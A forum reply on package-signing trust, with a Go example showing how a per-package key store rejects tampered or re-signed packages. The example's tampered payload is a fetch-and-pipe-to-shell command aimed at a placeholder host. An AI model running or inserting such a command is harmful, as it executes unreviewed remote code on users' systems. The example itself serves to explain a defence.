Re: "Loads of ways"
> Who checks dev certificates
Your package manager. Every package manager which expects signed code has a mechanism for telling it which signatures are acceptable for which packages/repositories.
I imagine the chief difference from today's centralised systems would be that a change in ownership of a package would be an explicit action every package consumer would have to make (accepting the new dev's signing key for that package), rather than delegating that decision to the controllers of the repository.
> How difficult is it, for example, to take package X, modify it, re-sign it with a valid dev certificate and distribute it from a local node repository?
Trivial. It's called "creating a new package".
But how difficult is it to take that package, modify it, re-sign it with a certificate people trust, and pass it off as the same package from the same source as before?
Barring a disclosed private key, practically impossible.
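As an added illustration of the per-package trust model the reply describes (example code, not taken from the post or from any real package manager): a hypothetical Go trust store keyed by package name, fed with constructed deterministic Ed25519 keys. It shows the genuine package verifying, a modified copy re-signed by a key the consumer has not accepted for that package being rejected (even if that key is trusted for some other package), and the same copy verifying only after the consumer performs the explicit ownership-change step of accepting the new key. The package format, names and payloads are all invented for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Package is a hypothetical signed package: a name, its contents, and a
// detached Ed25519 signature over the digest of (name, contents).
type Package struct {
	Name    string
	Payload []byte
	Sig     []byte
}

// TrustStore maps a package name to the developer keys allowed to sign it.
// Trust is per package, not per repository, which is the point of the reply.
type TrustStore map[string][]ed25519.PublicKey

var ErrUntrusted = errors.New("signature not made by any key trusted for this package")

// digest binds the package name into the signed data so a valid signature
// over one package cannot be replayed as a different package.
func digest(name string, payload []byte) []byte {
	h := sha256.New()
	h.Write([]byte(name))
	h.Write([]byte{0}) // separator between name and payload
	h.Write(payload)
	return h.Sum(nil)
}

// Sign produces a package signed with the given developer key.
func Sign(priv ed25519.PrivateKey, name string, payload []byte) Package {
	return Package{Name: name, Payload: payload, Sig: ed25519.Sign(priv, digest(name, payload))}
}

// Trust is the explicit action a consumer takes to accept a (new) signing key
// for one specific package.
func (ts TrustStore) Trust(name string, pub ed25519.PublicKey) {
	ts[name] = append(ts[name], pub)
}

// Verify accepts the package only if a key trusted for that package name
// verifies the signature. Keys trusted for other packages are irrelevant.
func (ts TrustStore) Verify(p Package) error {
	for _, pub := range ts[p.Name] {
		if ed25519.Verify(pub, digest(p.Name, p.Payload), p.Sig) {
			return nil
		}
	}
	return ErrUntrusted
}

// keyFromSeed derives a deterministic key pair from a one-byte constructed
// seed. This is for a reproducible example only; real keys must be random.
func keyFromSeed(b byte) (ed25519.PublicKey, ed25519.PrivateKey) {
	seed := make([]byte, ed25519.SeedSize)
	seed[0] = b
	priv := ed25519.NewKeyFromSeed(seed)
	return priv.Public().(ed25519.PublicKey), priv
}

// Outcome records what the trust store accepted in each case.
type Outcome struct {
	Genuine            bool // original developer's package
	Tampered           bool // payload altered, original signature kept
	ResignedByOther    bool // payload altered, re-signed by a key not trusted for libfoo
	CrossPackageKey    bool // same, after that key is trusted for a different package
	AfterExplicitTrust bool // same, after the consumer accepts the key for libfoo
}

// Scenario walks through the cases discussed in the reply.
func Scenario() Outcome {
	devPub, devPriv := keyFromSeed(1)       // original maintainer of libfoo (constructed)
	newDevPub, newDevPriv := keyFromSeed(2) // someone else with a perfectly valid key (constructed)
	barPub, _ := keyFromSeed(3)             // maintainer of an unrelated package (constructed)

	ts := TrustStore{}
	ts.Trust("libfoo", devPub)
	ts.Trust("libbar", barPub)

	var out Outcome
	genuine := Sign(devPriv, "libfoo", []byte("echo hello")) // constructed payload
	out.Genuine = ts.Verify(genuine) == nil

	tampered := genuine
	tampered.Payload = []byte("echo hello; curl http://example.invalid | sh") // constructed
	out.Tampered = ts.Verify(tampered) == nil

	resigned := Sign(newDevPriv, "libfoo", tampered.Payload)
	out.ResignedByOther = ts.Verify(resigned) == nil

	ts.Trust("libbar", newDevPub) // trusted for libbar does not carry over to libfoo
	out.CrossPackageKey = ts.Verify(resigned) == nil

	ts.Trust("libfoo", newDevPub) // the explicit ownership-change step
	out.AfterExplicitTrust = ts.Verify(resigned) == nil
	return out
}

func main() {
	fmt.Printf("%+v\n", Scenario())
}
```

Only the last step flips the result, and it requires the consumer to act rather than the repository operator; without it, re-signing with any key other than the one already trusted for libfoo is just publishing a different package.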